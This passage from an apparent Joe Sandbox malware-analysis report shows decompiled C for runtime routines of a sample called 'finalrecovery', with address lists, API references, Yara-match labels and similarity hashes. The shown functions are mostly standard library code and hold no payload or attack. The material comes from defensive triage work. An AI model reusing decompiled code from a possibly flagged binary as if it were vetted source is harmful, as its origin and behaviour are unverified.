				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E1000309B(_t34);
				 *_t60 = 0x2cc;
				_v632 = E10003BE0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E10003BE0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E1000309B(_t49);
				}
				return _t49;
			}

0x10002f80
0x10002f80
0x10002f80
0x10002f94
0x10002f96
0x10002f99
0x10002f99
0x10002f9d
0x10002fa2
0x10002fba
0x10002fc0
0x10002fc6
0x10002fcc
0x10002fd2
0x10002fd8
0x10002fde
0x10002fe5
0x10002fec
0x10002ff3
0x10002ffa
0x10003001
0x10003008
0x10003009
0x10003012
0x10003018
0x1000301b
0x10003021
0x10003030
0x1000303c
0x10003047
0x1000304e
0x10003055
0x10003060
0x10003068
0x10003071
0x10003073
0x10003076
0x10003078
0x10003082
0x1000308a
0x10003090
0x00000000
0x10003097
0x1000309a

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002F8C
IsDebuggerPresent.KERNEL32 ref: 10003058
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10003078
UnhandledExceptionFilter.KERNEL32(?), ref: 10003082

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1fc54d42d7f085c83be5bb40c933487c8c951e48705f5e01635f0ce73d594421
Instruction ID: 04648abf701f5a68dc6c1e36ded2dc2e81e8b0f6840b4fb512aaacde83866066
Opcode Fuzzy Hash: 1fc54d42d7f085c83be5bb40c933487c8c951e48705f5e01635f0ce73d594421
Instruction Fuzzy Hash: F5311875D052189BEB11DFA4D989BCDBBF8EF08344F1081AAE40DAB250EB719A858F04

Uniqueness

Uniqueness Score: -1.00%

Function 10005630 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E10005630(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x10017004; // 0xb1cc4d85
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E1000309B(_t41);
					_pop(_t61);
				}
				E10003BE0(_t66,  &_v804, 0, 0x50);
				E10003BE0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E1000309B(_t57);
				}
				return E100026A5(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x10005630
0x10005630
0x10005630
0x1000563b
0x10005640
0x10005642
0x1000564a
0x1000564c
0x1000564f
0x10005654
0x10005654
0x10005660
0x10005673
0x10005681
0x10005687
0x1000568d
0x10005693
0x10005699
0x1000569f
0x100056a5
0x100056ab
0x100056b1
0x100056b7
0x100056be
0x100056c5
0x100056cc
0x100056d3
0x100056da
0x100056e1
0x100056e2
0x100056eb
0x100056f1
0x100056f4
0x100056fa
0x10005707
0x10005710
0x10005719
0x10005722
0x10005730
0x10005732
0x10005747
0x10005753
0x10005756
0x1000575b
0x10005768

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005728
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 10005732
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1000573F

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 892245bd215ace0ce4340a2a6bd9b94d3c17d43c898c7ae01938082b0612e83f
Instruction ID: 8f0c72b485ae36d5d20cf576335094bf88066c54cdd2beb903ecd1af2e7e76d7
Opcode Fuzzy Hash: 892245bd215ace0ce4340a2a6bd9b94d3c17d43c898c7ae01938082b0612e83f
Instruction Fuzzy Hash: 853192749012289BDB62DF64D889B8DBBB8FF08350F5081DAE51CA6251E7719F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 10005EB5 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10005EB5(int _a4) {
				void* _t14;

				if(E10007A06(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E10005F3A(_t14, _a4);
				ExitProcess(_a4);
			}

0x10005ec2
0x10005ede
0x10005ede
0x10005ee7
0x10005ef0

APIs

GetCurrentProcess.KERNEL32(?,?,10005EB4,?,?,?,?,?,10001F08), ref: 10005ED7
TerminateProcess.KERNEL32(00000000,?,10005EB4,?,?,?,?,?,10001F08), ref: 10005EDE
ExitProcess.KERNEL32 ref: 10005EF0

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ea7f26f5967691b67dab3920186778f4749eb9fc42885c32184b385f004a135c
Instruction ID: a1f63a9a8ea659d92b262e4bb535059e371a7997e6b18d63e8dd7f281c17c166
Opcode Fuzzy Hash: ea7f26f5967691b67dab3920186778f4749eb9fc42885c32184b385f004a135c
Instruction Fuzzy Hash: BAE0B631510199ABEF02EB54CD49A5A3B6AFB44286F018415F9898A135CB7AEE51CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0040F773 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040F773(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x45054c =  *0x45054c & 0x00000000;
				 *0x43d060 =  *0x43d060 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x450550; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x450550 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x43d060; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x45054c = 1;
					 *0x43d060 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x45054c = 2;
						 *0x43d060 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x43d060; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x45054c = 3;
								 *0x43d060 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x45054c = 5;
									 *0x43d060 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x43d060 =  *0x43d060 | 0x00000040;
										 *0x45054c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x450550; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x450550 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0040f773
0x0040f776
0x0040f780
0x0040f791
0x0040f940
0x0040f943
0x0040f943
0x0040f797
0x0040f79d
0x0040f7a2
0x0040f7a6
0x0040f7aa
0x0040f7ab
0x0040f7ad
0x0040f7b0
0x0040f7b5
0x0040f7be
0x0040f7cf
0x0040f7da
0x0040f7e0
0x0040f7e1
0x0040f7e6
0x0040f7e9
0x0040f7ee
0x0040f7f6
0x0040f7f9
0x0040f7fc
0x0040f841
0x0040f841
0x0040f847
0x0040f847
0x0040f84c
0x0040f84d
0x0040f853
0x0040f884
0x0040f855
0x0040f857
0x0040f858
0x0040f85d
0x0040f860
0x0040f862
0x0040f865
0x0040f868
0x0040f86b
0x0040f86e
0x0040f877
0x0040f87c
0x0040f87c
0x0040f877
0x0040f887
0x0040f88c
0x0040f88f
0x0040f899
0x0040f8a4
0x0040f8aa
0x0040f8ad
0x0040f8b7
0x0040f8c2
0x0040f8ce
0x0040f8d1
0x0040f8d4
0x0040f8df
0x0040f8e4
0x0040f8e6
0x0040f8eb
0x0040f8ee
0x0040f8f8
0x0040f900
0x0040f905
0x0040f90f
0x0040f91d
0x0040f930
0x0040f937
0x0040f937
0x0040f91d
0x0040f900
0x0040f8e4
0x0040f8c2
0x00000000
0x0040f93f
0x0040f801
0x0040f80b
0x0040f830
0x0040f836
0x0040f839
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F789

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction ID: 4f8db1e84fa3524b3b346f9e76b7198fc21d40e16fa52266ef375bc31835d5f5
Opcode Fuzzy Hash: af8edf595f28d6e0de3f7c832e975c9ce316b7f81847fa13e3e8cff5d50537ce
Instruction Fuzzy Hash: 2A515BB29002199BEB28CF59D8957AABBF0FB48314F14843AD405EB7A1E378D905CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042039F Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042039F(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0041E592(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x004203ac
0x004203ae
0x004203b1
0x004203b4
0x004203b7
0x004203c8
0x004203ca
0x004203b9
0x004203bd
0x004203c6
0x00000000
0x00000000
0x004203c6
0x004203cf

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction ID: 3f92223e2ca754af41fd68be8ef222df285e4b676d2b49927b0229ad117657db
Opcode Fuzzy Hash: 7fc7f42db509279383e3cc01eb7112f14e58f64f47ca781cad5004ddb32a561f
Instruction Fuzzy Hash: 81E08C72A12238EBCB14DBC9D90498AF3FCEB48B54B55449BF901D3201C274DE40C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 004429E7 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction ID: c2f19552910a0c3bc7347bbf13de0f87239dfd182ffd37263a02f476a58fa8e8
Opcode Fuzzy Hash: 2ca6e8abd497ec3a1c156abf087cd513271e0a7e0f941d3f632673506c1267ca
Instruction Fuzzy Hash: 3AE08C72911238EBCB24DF89DA0499AF3ECEB44B55B51449BF901F3200C6B4DE00C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 10007A06 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10007A06(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E100073D6(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x10007a13
0x10007a15
0x10007a18
0x10007a1b
0x10007a1e
0x10007a2f
0x10007a31
0x10007a20
0x10007a24
0x10007a2d
0x00000000
0x00000000
0x10007a2d
0x10007a36

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction ID: 7fa7e7f11da0b43396639d3fdd67456086983de714439f05789908436ba01b59
Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction Fuzzy Hash: 20E08C32E11228EBCB10CB88C940D8AB3FCFB85A80B110096B505E3101D2B4DF00CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 0044028F Relevance: .0, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction ID: 16c2de7a8d20c9c44f0cfcec9700f4c07f8ea1dcaa74a4bc5a03d74aca8627af
Opcode Fuzzy Hash: b2bf1e3dbd56a5e62411fbd5e71e5e7a82189cacba0b21ec395735c552563347
Instruction Fuzzy Hash: 22E04F31000108EBDF216F94CE8DA493B29FB40345F000469FE04AA671CB79DC91DA48

Uniqueness

Uniqueness Score: -1.00%

Function 00418FC0 Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00418FC0(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0x43d054; // 0x8e1b5714
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0x430310;
					 *(_t252 + 0x94) = 0x430590;
					 *(_t252 + 0x98) = 0x430710;
					 *(_t252 + 4) = 1;
					L48:
					return E0040EB3F(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E0041E1DB(1, 4);
					E0041E238(_t205);
					_v32 = E0041E1DB(0x180, 2);
					E0041E238(_t205);
					_t237 = E0041E1DB(0x180, 1);
					_v44 = _t237;
					E0041E238(_t205);
					_v36 = E0041E1DB(0x180, 1);
					E0041E238(_t205);
					_v40 = E0041E1DB(0x101, 1);
					E0041E238(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E0041E238(_v52);
						E0041E238(_v32);
						E0041E238(_t237);
						E0041E238(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E0042136C(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E0042136C(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E004217F5(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E0041E238( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E0041E238( *(_t252 + 0x94) - 0x80);
											E0041E238( *(_t252 + 0x98) - 0x80);
											E0041E238( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E0041E238(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E00410A80(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E00421645(__edx);
